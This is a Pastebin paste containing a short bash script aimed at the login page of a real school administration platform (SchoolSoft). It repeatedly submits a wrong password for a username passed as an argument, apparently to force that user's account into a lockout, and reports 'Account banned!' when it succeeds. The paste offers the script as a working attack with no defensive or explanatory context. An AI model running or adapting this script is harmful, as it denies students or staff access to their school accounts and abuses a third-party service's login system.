Advertisement
Guest User

schoolsoft

a guest
Sep 2nd, 2016
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.35 KB | None | 0 0
  1. #!/bin/bash
  2. count=0;
  3. while :;
  4.  do
  5.     random=`head /dev/urandom | tr -dc A-Za-z0-9 | head -c 11`
  6.  
  7.     if [[ $(curl -s --url "https://sms.schoolsoft.se/itg/jsp/Login.jsp" --data "action=login&usertype=1&ssusername=$1&sspassword=a&button=Logga+in") = *felaktigt* ]];
  8.     then
  9.         echo "Running exploit..."
  10.     else
  11.         echo "Account banned!"
  12.      fi
  13. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement